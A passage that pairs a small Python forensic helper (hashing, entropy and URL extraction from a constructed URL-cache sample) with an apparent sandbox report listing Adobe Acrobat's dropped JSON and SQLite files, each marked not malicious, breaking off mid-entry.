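    entropy = shannon_entropy_8bit(data)
    return {
        "Size (bytes)": len(data),
        "Entropy (8bit)": entropy,
        "Encrypted": entropy >= threshold,
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
    }


def verify_hashes(data: bytes, expected: dict) -> list:
    """Names of the hash fields in `expected` that do not match `data`.
    Empty list means the recovered file is the one the report entry lists."""
    actual = file_metadata(data)
    return [k for k in ("MD5", "SHA1", "SHA-256", "SHA-512")
            if k in expected and expected[k].upper() != actual[k]]


def extract_utf16le_urls(data: bytes) -> list:
    """Decode at both byte alignments and collect distinct http(s) URLs."""
    found = []
    for offset in (0, 1):
        chunk = data[offset:]
        if len(chunk) % 2:
            chunk = chunk[:-1]
        text = chunk.decode("utf-16-le", errors="ignore")
        for url in URL_RE.findall(text):
            if url not in found:
                found.append(url)
    return found


# Constructed stand-in for a CryptnetUrlCache MetaData blob: a few header
# bytes, the fetched URL and an ETag-like string, all UTF-16LE. Not a real file.
SAMPLE_URLCACHE_METADATA = (
    b"p\x00\x00\x00\x00\x00\x00\x00"
    + "http://x1.i.lencr.org/".encode("utf-16-le")
    + b"\x00\x00"
    + '"64cd6654-56f"'.encode("utf-16-le")
    + b"\x00\x00"
)

if __name__ == "__main__":
    for key, value in file_metadata(SAMPLE_URLCACHE_METADATA).items():
        print(f"{key}:{value}")
    print("URLs:", extract_utf16le_urls(SAMPLE_URLCACHE_METADATA))
```

Feed `verify_hashes` the bytes of a file copied out of the analysis VM together with the MD5/SHA1/SHA-256 values from its entry; any name it returns marks a field that does not match, which usually means the wrong file was copied or the sandbox export altered it.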
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):295
                                                                                          Entropy (8bit):5.380474895171467
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:YEQXJ2HXqrK/U/KKV4WsGiIPEeOF0YE8DoAvJM3g98kUwPeUkwRe9:YvXKXqrsLKRsdTeOAGMbLUkee9
                                                                                          MD5:A04311E4F7503E13BC7D0699A8DC0AD9
                                                                                          SHA1:79BA255FE990C6E26AC8F5C51A54B11838BD239A
                                                                                          SHA-256:17791CCC0A680CDC899BB2EAFA5BBD49F4EB3CC71D5D1F1A171F61D0114D40EE
                                                                                          SHA-512:C85F96EF3620896AA5E9D7BEFCF17513ED3627709BDF0FA9D3874FC3FBCACF34309DF7A29081204AB00516DD790F893F5F92234E38B590B847B88ED3BD2743B5
                                                                                          Malicious:false
                                                                                          Preview:{"analyticsData":{"responseGUID":"3054d90d-1063-46a3-9370-8e2bae42d569","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734788692409,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):294
                                                                                          Entropy (8bit):5.318721355951607
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:YEQXJ2HXqrK/U/KKV4WsGiIPEeOF0YE8DoAvJfBoTfXpnrPeUkwRe9:YvXKXqrsLKRsdTeOAGWTfXcUkee9
                                                                                          MD5:39F1C8EDD62A6FA63BB5940582E35A00
                                                                                          SHA1:13D547C7ECB8FB1290B95CFDA22017A9D1FBD74D
                                                                                          SHA-256:04BAB6CE67C198FBF2269AACE54869F118645738D619FA42197B1286C1646F35
                                                                                          SHA-512:1D6217403F39AFD22DAC84BEE83B706848B48323DEB2852215CABF8D13952085B272D85C925F33688AAEEA386E78166A89CA1FE6346CFF76C8EA8EC7C184C920
                                                                                          Malicious:false
                                                                                          Preview:{"analyticsData":{"responseGUID":"3054d90d-1063-46a3-9370-8e2bae42d569","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734788692409,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):294
                                                                                          Entropy (8bit):5.2982079250890095
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:YEQXJ2HXqrK/U/KKV4WsGiIPEeOF0YE8DoAvJfBD2G6UpnrPeUkwRe9:YvXKXqrsLKRsdTeOAGR22cUkee9
                                                                                          MD5:014B211EE5ABFF835264B0799D639007
                                                                                          SHA1:843C498EEF6E3E369CF4F1E4828664E4E48C8935
                                                                                          SHA-256:DE3A081B4CC58C9C181DC78D18661EADA051A836239413A4CE0093F09485995A
                                                                                          SHA-512:391A51E726488CA8973983A3F8E9C4BFBF86B6100CE2406DF775216B0CEA3AF1C545F4D78C26897D40ED0BB98A2086A6EBABEBF20449159590BBA46C10B59334
                                                                                          Malicious:false
                                                                                          Preview:{"analyticsData":{"responseGUID":"3054d90d-1063-46a3-9370-8e2bae42d569","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734788692409,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):285
                                                                                          Entropy (8bit):5.3679536021457315
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:YEQXJ2HXqrK/U/KKV4WsGiIPEeOF0YE8DoAvJfPmwrPeUkwRe9:YvXKXqrsLKRsdTeOAGH56Ukee9
                                                                                          MD5:C87AF7C2CC97AB48B46E21844E33FD26
                                                                                          SHA1:8E991DF2ED98A97AA8C970A6BFE04964B1C31BCF
                                                                                          SHA-256:343394B9F17D275EF1520302520FB2572FFDA38583CA9826D7D5209AD159CB53
                                                                                          SHA-512:201A3605E82D9D3DE2689B55F2CE62C3C2E79F1F93E9FB5E712206963C84F25766F410730BD818315C64B42B33614CCBBC83691E80CEA4A927A7A0539B50F099
                                                                                          Malicious:false
                                                                                          Preview:{"analyticsData":{"responseGUID":"3054d90d-1063-46a3-9370-8e2bae42d569","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734788692409,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):1123
                                                                                          Entropy (8bit):5.687129763083913
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:Yv6XSs6meOdpLgE9cQx8LennAvzBvkn0RCmK8czOCCS3:YvtsJemhgy6SAFv5Ah8cv/3
                                                                                          MD5:F78F067E4B62297867D6C42F4241D4F9
                                                                                          SHA1:FAABDC3175004E751FF3E6B27289054D0EC01558
                                                                                          SHA-256:CD87B12E1A60142EFAD00B46CFAD8561331F7797B0B5504BB4A5F3444698AE96
                                                                                          SHA-512:B34A2C18023C7A5027F80AC8B075FF930CB659EDA4D065E9B1944356435E7B081B99C1B68004B8537ACE3DC7987116FD746434F7926B030B52CE3A44A77F6054
                                                                                          Malicious:false
                                                                                          Preview:{"analyticsData":{"responseGUID":"3054d90d-1063-46a3-9370-8e2bae42d569","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734788692409,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):289
                                                                                          Entropy (8bit):5.303325740156883
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:YEQXJ2HXqrK/U/KKV4WsGiIPEeOF0YE8DoAvJf8dPeUkwRe9:YvXKXqrsLKRsdTeOAGU8Ukee9
                                                                                          MD5:E9FC1F400710CC67F0074EFF447A3EFD
                                                                                          SHA1:7FCB64CB9732B8D693B0256F15C174D14DAE3578
                                                                                          SHA-256:3EB36C37CE0192EAE4FE536FF62B60ECED23D000A30A6A9F21866E5D003FACE2
                                                                                          SHA-512:BF66C537245265DD9109684B4980C7FCADEDAFFFAEA67C85D7E2461B584AED3F4FBCE637534504672622CA1FF474B81175EBF3E621E1937CD9E20C843C2186D8
                                                                                          Malicious:false
                                                                                          Preview:{"analyticsData":{"responseGUID":"3054d90d-1063-46a3-9370-8e2bae42d569","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734788692409,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):292
                                                                                          Entropy (8bit):5.307192207217964
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:YEQXJ2HXqrK/U/KKV4WsGiIPEeOF0YE8DoAvJfQ1rPeUkwRe9:YvXKXqrsLKRsdTeOAGY16Ukee9
                                                                                          MD5:E5D601985175111664A7AA49E54AF5C2
                                                                                          SHA1:86F11C6A1AABDF81E112EBD919DFE7C0FA870AA5
                                                                                          SHA-256:053C052D1422E38907B2F608D548A5FD13169C517608086626D7309084972CEF
                                                                                          SHA-512:6F2963416B99E1F2A9EDD21C4D0A301D86FD2CBEC6B42E1B10ACCABB034A8503563F3AE0617705278FBCF931F4A02816D0C2FF677BAF3F19C6C09E64ABD79A1A
                                                                                          Malicious:false
                                                                                          Preview:{"analyticsData":{"responseGUID":"3054d90d-1063-46a3-9370-8e2bae42d569","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734788692409,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):289
                                                                                          Entropy (8bit):5.320895191709815
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:YEQXJ2HXqrK/U/KKV4WsGiIPEeOF0YE8DoAvJfFldPeUkwRe9:YvXKXqrsLKRsdTeOAGz8Ukee9
                                                                                          MD5:2B5D96EF51667A81811B726A55B9E618
                                                                                          SHA1:B97032E08D64ED8E86E10C71DE0C3B22870E2DAD
                                                                                          SHA-256:7C6FEC91BE1234F78E7B98F0A8FFE9F941526ADBE922F6892B7189A76BA09968
                                                                                          SHA-512:106C0F9A3E917DA97F00567E7D1B0A7D119BB2EE8FF311EF8DE598833967309747FCEC4B489B018C52E033D92FC84424898EB4CC52C6D9AB08E24DD79C44BB52
                                                                                          Malicious:false
                                                                                          Preview:{"analyticsData":{"responseGUID":"3054d90d-1063-46a3-9370-8e2bae42d569","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734788692409,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):295
                                                                                          Entropy (8bit):5.328355774122141
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:YEQXJ2HXqrK/U/KKV4WsGiIPEeOF0YE8DoAvJfzdPeUkwRe9:YvXKXqrsLKRsdTeOAGb8Ukee9
                                                                                          MD5:A6825B98FDCC55DA71FF8383A9DD1578
                                                                                          SHA1:0476823287FC4327C515CBB4878F73251830580F
                                                                                          SHA-256:02680ABC590AA6656A6506BA22380F84C8A621D54C61F88FD60FEB97E0728F01
                                                                                          SHA-512:1C08907A479C4CCAE08967AD57655A3896F180435F32A4CD0E76B7955A3F70E3647F48F84F16910BD86B4EB956D54F44E6F22A00271D12A07B9488783AEB205D
                                                                                          Malicious:false
                                                                                          Preview:{"analyticsData":{"responseGUID":"3054d90d-1063-46a3-9370-8e2bae42d569","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734788692409,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):289
                                                                                          Entropy (8bit):5.309186205197633
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:YEQXJ2HXqrK/U/KKV4WsGiIPEeOF0YE8DoAvJfYdPeUkwRe9:YvXKXqrsLKRsdTeOAGg8Ukee9
                                                                                          MD5:3FD34F2086B762526076E889BC07D865
                                                                                          SHA1:3C3B31E85D7C2A6EF6E0DD8343999223B3A751CF
                                                                                          SHA-256:B9CAF21EF7BDBEBAB7D373EB1C574F08183AEA36D3972F471D64BC09325F97C1
                                                                                          SHA-512:DDBCC3DA2A93837A34B7B0C3077A4448141FFB92C28808D36109D5D2FA9C8371371164C46395510755E13291EFEA55C88668E82DC4A3F625FB51E5A6630ABB87
                                                                                          Malicious:false
                                                                                          Preview:{"analyticsData":{"responseGUID":"3054d90d-1063-46a3-9370-8e2bae42d569","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734788692409,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):284
                                                                                          Entropy (8bit):5.295697297912894
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:YEQXJ2HXqrK/U/KKV4WsGiIPEeOF0YE8DoAvJf+dPeUkwRe9:YvXKXqrsLKRsdTeOAG28Ukee9
                                                                                          MD5:30D4CBAEC25E06B21537FCCD16BC8111
                                                                                          SHA1:E27AA85B50F67197D32E62FF3A6DC71116A91D06
                                                                                          SHA-256:726AA3DCD13AB4387B9922A6246E296AA440A6DBB3951028486FD905A30D9924
                                                                                          SHA-512:BD1DDC6FB9477D3F2E9CE010CF4405ABAD81B9383CCB01758B918E64E5F94E2A1C9BD42500D856974F8E45912233A000B46C712EF104DDEB0182B7FFEE52E0DA
                                                                                          Malicious:false
                                                                                          Preview:{"analyticsData":{"responseGUID":"3054d90d-1063-46a3-9370-8e2bae42d569","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734788692409,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):291
                                                                                          Entropy (8bit):5.292670167440584
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:YEQXJ2HXqrK/U/KKV4WsGiIPEeOF0YE8DoAvJfbPtdPeUkwRe9:YvXKXqrsLKRsdTeOAGDV8Ukee9
                                                                                          MD5:B84820B867C9FF2466568AD0F4BEF8DD
                                                                                          SHA1:67CC040C3A81022A6FB8D4EDF31CD4D3BFA8935E
                                                                                          SHA-256:C591D1E6CA3D7095F59F8C99AEBAFE35F33C67E4BB29E17FDD26CBF23FBFED72
                                                                                          SHA-512:D300F7D1C04F3A22A03A063E6D634ABEC201EE81FCE019B792DC5458B157BB94EAEED707D4C9B1FDBD8A9D48D014230C4650ACD72ED8BAC138CDD01C8D445B54
                                                                                          Malicious:false
                                                                                          Preview:{"analyticsData":{"responseGUID":"3054d90d-1063-46a3-9370-8e2bae42d569","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734788692409,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):287
                                                                                          Entropy (8bit):5.2974487708749525
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:YEQXJ2HXqrK/U/KKV4WsGiIPEeOF0YE8DoAvJf21rPeUkwRe9:YvXKXqrsLKRsdTeOAG+16Ukee9
                                                                                          MD5:89E2DBB2A7DC2A8B0361DB18123F29DA
                                                                                          SHA1:CA86DFE016412C5C9AD1896FDC68E42737FC88F1
                                                                                          SHA-256:B57E29A5DF42DE3C8A42C8AC41A230E36B546EBB08DED5D722B4279537A549C2
                                                                                          SHA-512:3B93B1D82CD43D771DABADA66903BAE57C43FC5E6E315B9EE6BE029E69DDD9D5E8BAF8E5FF4C67B9FF4CD671764E1BB1474F1EAF5659FF4A17839E2040EA61BE
                                                                                          Malicious:false
                                                                                          Preview:{"analyticsData":{"responseGUID":"3054d90d-1063-46a3-9370-8e2bae42d569","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734788692409,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):1090
                                                                                          Entropy (8bit):5.6609352846964285
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:Yv6XSs6meOlamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BS3:YvtsJe0BgkDMUJUAh8cvM3
                                                                                          MD5:C95FA0FB9D451E1F42DB9EBC9C289A00
                                                                                          SHA1:F566F13C866453BD5B4A4F2076C006C77375AD72
                                                                                          SHA-256:69BA40CF8BC5B302CE3F15061892E8A7453B60A27F052FC2DEFE98466A162D65
                                                                                          SHA-512:8B8DE301E4C82CF36DE2FB2B8CDD94AB9E0051AE33179A49138E9F2DDAF0343C04495DDD22DE5984495370BFEF3C8BCC76E41450DD94C9E6EBEBB6F4C0BC38B6
                                                                                          Malicious:false
                                                                                          Preview:{"analyticsData":{"responseGUID":"3054d90d-1063-46a3-9370-8e2bae42d569","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734788692409,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):286
                                                                                          Entropy (8bit):5.272277792730928
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:YEQXJ2HXqrK/U/KKV4WsGiIPEeOF0YE8DoAvJfshHHrPeUkwRe9:YvXKXqrsLKRsdTeOAGUUUkee9
                                                                                          MD5:5C7C3B1B1C3BA1C0C99A8CA927789AE8
                                                                                          SHA1:0645A4B591ABFCEFCF09C95E635870738AE46BDE
                                                                                          SHA-256:D54FBE647BD481285B64D0B8220E9EE07DB31E56AC97EC3FE36CD806B8DDDE51
                                                                                          SHA-512:646D7186BA0C4BF845FA89D0287FD9417CB1F444DB1AB3EF4529FE729B6E612E7C1078BD72C42E76D149F582ED25186A226BD8CD62CF97F56F1E65447080EC79
                                                                                          Malicious:false
                                                                                          Preview:{"analyticsData":{"responseGUID":"3054d90d-1063-46a3-9370-8e2bae42d569","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734788692409,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):282
                                                                                          Entropy (8bit):5.287184362302357
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:YEQXJ2HXqrK/U/KKV4WsGiIPEeOF0YE8DoAvJTqgFCrPeUkwRe9:YvXKXqrsLKRsdTeOAGTq16Ukee9
                                                                                          MD5:F290521E2F6E6E87C42C98740B5054A6
                                                                                          SHA1:505D03FFB71E21A84F3BEB4E4CACF5F23D8CF2C0
                                                                                          SHA-256:4E4DE1743DE2CC88331E6C20498D46406F91EC696156AAC787B7F4CFB3F43B08
                                                                                          SHA-512:D52E248BEDEDEE8393E538BC1B5C82CBF0082CE2EE285FE50E1982C192DFDF277C612C0E0F84298FD7532E1F401E63C0AF3489D4A11F542EFF0B7B22C3D4BF07
                                                                                          Malicious:false
                                                                                          Preview:{"analyticsData":{"responseGUID":"3054d90d-1063-46a3-9370-8e2bae42d569","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734788692409,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):4
                                                                                          Entropy (8bit):0.8112781244591328
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:e:e
                                                                                          MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                          SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                          SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                          SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                          Malicious:false
                                                                                          Preview:....
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):2814
                                                                                          Entropy (8bit):5.13807488982936
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:Yw/ICEDCNCYCxfzZCXCdCDcCD7bCV0CaNVCZm+CBKXCsOr9/xT:T/ICEDCNCYCxbZCXCdCDcCD7bCV0C2Cc
                                                                                          MD5:5E70B3B9DCFA435281C1058FF9517F2A
                                                                                          SHA1:1C0BC3E596C0AF891B112157A29E54BE781A1A9D
                                                                                          SHA-256:9D3830499E205B4DE3E401F04B026C04C0B124CE6E3DCC94955F185BD723BBB0
                                                                                          SHA-512:6471848F4E1EA267C88FAD91B645EACA584E638DE22D304C733D6F0918CB7C95646F6C543D56096F76F1F37BB2827ED9EDEBD8EC6F99454D7739A8A202E5A258
                                                                                          Malicious:false
                                                                                          Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"215b19a53404e0aef52a873c04e6f5d3","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734613723000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"f6e63fcb215afe2b173215247186bace","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734613723000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"fba2eecd561b2c6a1cdc413cdadc1468","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734613723000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"4866a966d6e4ae69b6edae55f2509de1","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734613723000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"f7dd334f2eb735f0d6433c97a1a09696","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734613723000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"d615731e757b063891110491811983ab","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                                          Category:dropped
                                                                                          Size (bytes):12288
                                                                                          Entropy (8bit):1.4514612073139428
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:TGufl2GL7msCvrBd6dHtbGIbPe0K3+fDy2ds1UlWO:lNVmsw3SHtbDbPe0K3+fDZdc7O
                                                                                          MD5:2069B359FFA31EB3F319695BB14C29C6
                                                                                          SHA1:91D753E0344D2E6B6874A7163327ADF825D26FC5
                                                                                          SHA-256:3352D6199DF0C2A33E01B29425B9B1888CFC1D52D7D8C2927017BFE553D7550D
                                                                                          SHA-512:A0E11B817EFA76A36AD38E21A962C285F8FD9170B71FC3E69D887D07EB7F141F2CC2091564613BEE2B147EF954B8A849AEAEE0A0245E5D28489F8692928CE51E
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:SQLite Rollback Journal
                                                                                          Category:dropped
                                                                                          Size (bytes):8720
                                                                                          Entropy (8bit):1.955484376620564
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:7MGrvrBd6dHtbGIbPe0K3+fDy2ds1xNqFl2GL7msk:7L3SHtbDbPe0K3+fDZdcrKVmsk
                                                                                          MD5:80587A4FFCE53BE2E949614E212DD60E
                                                                                          SHA1:6211D690A5D9A6DB853DB4A1253A2C83263A6686
                                                                                          SHA-256:3AD38F7EE3F070C4756CF8B59B4828C2F0CCDD2CAF9A1057975765CD83ADD034
                                                                                          SHA-512:20391627AC60D808599811381AE9D4628A80A6FDC2A6978AC0728AF36475F7595BA0A2B34F6610970AF976456660298DB9678CC33E69DBB570891AE7AD4C9997
                                                                                          Malicious:false
                                                                                          Preview:.... .c......M|.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................v.../.././././....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):66726
                                                                                          Entropy (8bit):5.392739213842091
                                                                                          Encrypted:false
